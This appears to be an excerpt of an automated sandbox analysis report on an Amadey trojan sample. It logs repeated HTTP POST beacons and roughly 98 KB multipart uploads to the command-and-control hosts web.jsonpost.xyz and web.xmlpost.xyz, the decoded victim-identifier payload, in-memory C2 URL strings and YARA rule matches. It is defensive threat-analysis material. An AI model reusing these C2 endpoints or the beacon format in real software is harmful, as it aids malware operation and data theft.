              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----b3714476196bb616692c6ded08e7aac7Host: web.jsonpost.xyzContent-Length: 98018Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----b3714476196bb616692c6ded08e7aac7Host: web.jsonpost.xyzContent-Length: 98018Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----67f1dda3f58c30bca5812691cfd54a6eHost: web.jsonpost.xyzContent-Length: 98283Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----20803717bf274c582f30f80916c596d3Host: web.jsonpost.xyzContent-Length: 102801Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----b3714476196bb616692c6ded08e7aac7Host: web.jsonpost.xyzContent-Length: 98018Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----b3714476196bb616692c6ded08e7aac7Host: web.jsonpost.xyzContent-Length: 98018Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----1f222d7432ca15c9e43b1e0ff82cdbaaHost: web.jsonpost.xyzContent-Length: 98266Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----b3714476196bb616692c6ded08e7aac7Host: web.jsonpost.xyzContent-Length: 98018Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----b3714476196bb616692c6ded08e7aac7Host: web.jsonpost.xyzContent-Length: 98018Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----2b8041a10abd63097aaf92c151839ca7Host: web.jsonpost.xyzContent-Length: 98296Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----b3714476196bb616692c6ded08e7aac7Host: web.jsonpost.xyzContent-Length: 98018Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----5add77a23e85c1c8c456f4525574afb1Host: web.jsonpost.xyzContent-Length: 103478Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----b3714476196bb616692c6ded08e7aac7Host: web.jsonpost.xyzContent-Length: 98018Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----b3714476196bb616692c6ded08e7aac7Host: web.jsonpost.xyzContent-Length: 98018Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----b3714476196bb616692c6ded08e7aac7Host: web.jsonpost.xyzContent-Length: 98018Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----edaa48f9ea7e20f29ead8fcbe5fb1f54Host: web.jsonpost.xyzContent-Length: 98554Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----b3714476196bb616692c6ded08e7aac7Host: web.jsonpost.xyzContent-Length: 97961Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: Joe Sandbox ViewIP Address: 72.52.178.23 72.52.178.23
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\user\Desktop\S7AGd447vH.exeCode function: 0_2_0040700B WriteFile,WriteFile,InternetReadFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_0040700B
              Source: global trafficDNS traffic detected: DNS query: web.jsonpost.xyz
              Source: global trafficDNS traffic detected: DNS query: web.xmlpost.xyz
              Source: unknownHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7Host: web.jsonpost.xyzContent-Length: 98005Cache-Control: no-cache
              Source: dllhost.exe, 00000001.00000003.2074636370.00000000008F2000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1806281208.00000000008F3000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1872056759.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1775452885.00000000008C9000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.2074557062.0000000023B84000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.2074756510.000000000088D000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1872056759.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.jsonpost.xyz/sj2vMs/index.php
              Source: dllhost.exe, 00000001.00000003.1986592314.00000000008F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.jsonpost.xyz/sj2vMs/index.php#
              Source: dllhost.exe, 00000001.00000003.1872056759.00000000008C9000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.2074756510.000000000088D000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1872056759.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.jsonpost.xyz/sj2vMs/index.php?scr=1
              Source: dllhost.exe, 00000001.00000003.2074636370.00000000008F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.jsonpost.xyz/sj2vMs/index.php?scr=1#
              Source: dllhost.exe, 00000001.00000003.1833879370.00000000008C9000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1817745095.00000000008C9000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1806321286.00000000008C9000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1872056759.00000000008C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.jsonpost.xyz/sj2vMs/index.php?scr=1G
              Source: dllhost.exe, 00000001.00000003.1986578008.0000000000912000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.jsonpost.xyz/sj2vMs/index.php?scr=1RE
              Source: dllhost.exe, 00000001.00000003.1833879370.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1806321286.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1817745095.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1872056759.00000000008E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.jsonpost.xyz/sj2vMs/index.phpQ
              Source: dllhost.exe, 00000001.00000003.1986592314.00000000008F2000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.2074699978.0000000000911000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.2074636370.00000000008F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.jsonpost.xyz/sj2vMs/index.phpded
              Source: dllhost.exe, 00000001.00000003.1833879370.000000000088D000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1833879370.00000000008E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.jsonpost.xyz/sj2vMs/index.phpncoded
              Source: dllhost.exe, 00000001.00000003.1806307598.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1806281208.00000000008F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.jsonpost.xyz/sj2vMs/index.phpncodedY
              Source: dllhost.exe, 00000001.00000003.1833879370.00000000008E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.xQ
              Source: dllhost.exe, 00000001.00000003.2074699978.0000000000911000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.2074636370.00000000008F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.xmlpo
              Source: dllhost.exe, 00000001.00000003.1776075882.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1817713247.00000000008F7000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1833879370.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.2074699978.0000000000911000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.2074636370.00000000008F2000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1872056759.00000000008E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.xmlpost.x
              Source: dllhost.exe, 00000001.00000003.1871896347.000000000090A000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1872056759.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.xmlpost.xyz/sj2vMs/index.php
              Source: dllhost.exe, 00000001.00000003.1775452885.00000000008C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.xmlpost.xyz/sj2vMs/index.php(
              Source: dllhost.exe, 00000001.00000003.1871951511.00000000008F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.xmlpost.xyz/sj2vMs/index.php)
              Source: dllhost.exe, 00000001.00000003.1871951511.00000000008F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.xmlpost.xyz/sj2vMs/index.php/
              Source: dllhost.exe, 00000001.00000003.1871951511.00000000008F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.xmlpost.xyz/sj2vMs/index.php:
              Source: dllhost.exe, 00000001.00000003.2074756510.000000000088D000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1872056759.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.xmlpost.xyz/sj2vMs/index.php?scr=1
              Source: dllhost.exe, 00000001.00000003.2074756510.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.xmlpost.xyz/sj2vMs/index.php?scr=16H
              Source: dllhost.exe, 00000001.00000003.1871951511.00000000008F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.xmlpost.xyz/sj2vMs/index.phpC
              Source: dllhost.exe, 00000001.00000003.1806321286.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.xmlpost.xyz/sj2vMs/index.phpC:
              Source: dllhost.exe, 00000001.00000003.1806307598.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1806281208.00000000008F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.xmlpost.xyz/sj2vMs/index.phpD
              Source: dllhost.exe, 00000001.00000003.1833879370.000000000088D000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1806321286.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.xmlpost.xyz/sj2vMs/index.phpD5A8D8D892DAAFDE
              Source: dllhost.exe, 00000001.00000003.1817745095.000000000088D000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1806321286.000000000088D000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1872056759.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.xmlpost.xyz/sj2vMs/index.phpD5A8D8D892DAAFDEetCookiesW3
              Source: dllhost.exe, 00000001.00000003.2074756510.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.xmlpost.xyz/sj2vMs/index.phpD5A8D8D892DAAFDEg3y
              Source: dllhost.exe, 00000001.00000003.1872056759.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.xmlpost.xyz/sj2vMs/index.phpD5A8D8D892DAAFDEg4y
              Source: dllhost.exe, 00000001.00000003.1817745095.000000000088D000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1806321286.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.xmlpost.xyz/sj2vMs/index.phpD5A8D8D892DAAFDEs
              Source: dllhost.exe, 00000001.00000003.1833860453.00000000008F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.xmlpost.xyz/sj2vMs/index.phpR
              Source: dllhost.exe, 00000001.00000003.1871951511.00000000008F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.xmlpost.xyz/sj2vMs/index.phpg
              Source: dllhost.exe, 00000001.00000003.2074756510.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.xmlpost.xyz/sj2vMs/index.phpgW
              Source: dllhost.exe, 00000001.00000003.1776075882.00000000008E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.xmlpost.xyz/sj2vMs/index.phpv
              Source: dllhost.exe, 00000001.00000003.1776075882.00000000008E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.xmlpost.xyz/sj2vMs/inl

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 1.3.dllhost.exe.2204848.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 1.3.dllhost.exe.2204848.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: 0.3.S7AGd447vH.exe.914800.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 0.3.S7AGd447vH.exe.914800.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: 7.3.dllhost.exe.22244848.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 7.3.dllhost.exe.22244848.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: 1.3.dllhost.exe.2243e58.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 1.3.dllhost.exe.2243e58.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: 1.3.dllhost.exe.604800.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 1.3.dllhost.exe.604800.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: 0.3.S7AGd447vH.exe.2224848.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 0.3.S7AGd447vH.exe.2224848.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
